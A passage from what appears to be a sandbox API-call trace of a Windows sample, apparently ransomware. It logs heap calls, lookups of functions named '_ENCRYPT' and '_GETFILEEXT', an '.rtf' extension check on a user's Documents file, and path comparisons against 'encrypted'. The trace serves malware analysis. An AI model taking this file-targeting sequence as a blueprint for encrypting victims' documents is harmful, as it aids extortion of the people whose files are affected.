hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.214] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0033.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.216] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.216] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.217] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0033.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.218] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.218] CloseHandle (hObject=0x128) returned 1 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.218] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.232] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.233] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.233] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.233] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.233] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.233] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.233] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.233] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.233] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x4ca0c60, ftLastWriteTime.dwHighDateTime=0x1d5c073, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x777648, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 0x7c20c0 [0033.233] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.234] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.234] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x4ca0c60, ftLastWriteTime.dwHighDateTime=0x1d5c073, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x777648, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 0x7c20c0 [0033.234] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.234] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, 